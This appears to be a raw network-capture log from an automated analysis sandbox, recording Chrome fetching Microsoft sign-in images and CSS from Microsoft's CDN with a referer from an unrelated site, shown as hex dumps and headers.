                                                                                                                              2024-11-18 16:56:21 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.1749763152.199.21.1754436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:22 UTC657OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:22 UTC738INHTTP/1.1 200 OK
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Age: 20599206
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:22 GMT
                                                                                                                              Etag: 0x8D79A1B9F5E121A
                                                                                                                              Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                              Server: ECAcc (lhc/7936)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: HIT
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              Content-Length: 3651
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:56:22 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.1749764152.199.21.1754436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:22 UTC656OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:22 UTC737INHTTP/1.1 200 OK
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Age: 2901083
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:22 GMT
                                                                                                                              Etag: 0x8D7B007297AE131
                                                                                                                              Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                              Server: ECAcc (lhc/7886)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: HIT
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              Content-Length: 1864
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:56:22 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.174976713.107.246.444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:22 UTC414OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:22 UTC805INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:22 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 276
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:34 GMT
                                                                                                                              ETag: 0x8D79B8371B97A82
                                                                                                                              x-ms-request-id: 3112634a-601e-0051-1453-396177000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241118T165622Z-16547b76f7fkf5v9hC1DFW2y5s00000005w000000000r12g
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-11-18 16:56:22 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.1749768152.199.21.1754436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:23 UTC748OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css HTTP/1.1
                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Purpose: prefetch
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:23 UTC735INHTTP/1.1 200 OK
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Age: 20594500
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-MD5: 9K2/nGCj75WAmmAI9nZNCA==
                                                                                                                              Content-Type: text/css
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:23 GMT
                                                                                                                              Etag: 0x8DA7650B375AC9B
                                                                                                                              Last-Modified: Thu, 04 Aug 2022 19:37:00 GMT
                                                                                                                              Server: ECAcc (lhc/7910)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: HIT
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-request-id: 3019d2b9-e01e-00fd-7f8c-7e2068000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              Content-Length: 110586
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20
                                                                                                                              Data Ascii: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 73 2d 31 2c 2e 63 6f 6c 2d 78 73 2d 32 2c 2e 63 6f 6c 2d 78 73 2d 33 2c 2e 63 6f 6c 2d 78 73 2d 34 2c 2e 63 6f 6c 2d 78 73 2d 35 2c 2e 63 6f 6c 2d 78 73 2d 36 2c 2e 63 6f 6c 2d 78 73 2d 37 2c 2e 63 6f 6c 2d 78 73 2d 38 2c 2e 63 6f 6c 2d 78 73 2d 39 2c 2e 63 6f 6c 2d 78 73 2d 31 30 2c 2e 63 6f 6c 2d 78 73 2d 31 31 2c 2e 63 6f 6c 2d 78 73 2d 31 32 2c 2e 63 6f 6c 2d 78 73 2d 31 33 2c 2e 63 6f 6c 2d 78 73 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 7b 66 6c 6f 61 74 3a
                                                                                                                              Data Ascii: s-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-13,.col-xs-14,.col-xs-15,.col-xs-16,.col-xs-17,.col-xs-18,.col-xs-19,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24{float:
                                                                                                                              2024-11-18 16:56:23 UTC2INData Raw: 72 67
                                                                                                                              Data Ascii: rg
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 69 6e 2d 6c 65 66 74 3a 39 35 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 32 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 6c 65 67 65 6e 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78
                                                                                                                              Data Ascii: in-left:95.83333%}.col-xl-offset-24{margin-left:100%}}fieldset{padding:0;margin:0;border:0;min-width:0}legend{display:block;width:100%;padding:0;border:0}label{display:inline-block;max-width:100%}input[type="search"]{-webkit-box-sizing:border-box;-moz-box
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 6f 77 2d 78 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2e 30 31 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 33 39 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2c 2e 74 61 62 6c
                                                                                                                              Data Ascii: ow-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr>th,.tabl
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 22 2c 22 54 75 6e 67 61 22 2c 22 4c 61 6f 20 55 49 22 2c 22 52 61 61 76 69 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4c 61 74 68 61 22 2c 22 4c 65 65 6c 61 77 61 64 65 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 20 55 49 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f
                                                                                                                              Data Ascii: ","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongo
                                                                                                                              2024-11-18 16:56:23 UTC16383INData Raw: 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 7d 2e 62 75 74 74 6f 6e 2e 73 65 63 6f 6e 64 61 72 79 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 70 78
                                                                                                                              Data Ascii: imary:active,input[type="submit"].btn-primary:active,input[type="reset"].btn-primary:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-transform:scale(.98);transform:scale(.98)}.button.secondary{display:inline-block;min-width:100px
                                                                                                                              2024-11-18 16:56:24 UTC12286INData Raw: 65 6e 74 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 3a 61 63 74 69 76 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 37 38 64 37 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 30 7d 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 6d 65 6d 62 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 65 6c 65 63 74 3a 66 6f 63 75 73 7b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 37 38 64 37 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68
                                                                                                                              Data Ascii: ent}.dropdown-toggle.membernamePrefillSelect:active{transform:none;border:1px solid #0078d7;border-top-width:0;border-left-width:0;border-right-width:0}.dropdown-toggle.membernamePrefillSelect:focus{transform:none;border:1px solid #0078d7;border-top-width


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.1749770152.199.21.1754436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:23 UTC420OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:23 UTC738INHTTP/1.1 200 OK
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Age: 20599207
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:23 GMT
                                                                                                                              Etag: 0x8D79A1B9F5E121A
                                                                                                                              Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                              Server: ECAcc (lhc/7936)
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: HIT
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-request-id: 91dbb46b-a01e-00e9-0b81-7e3c42000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              Content-Length: 3651
                                                                                                                              Connection: close
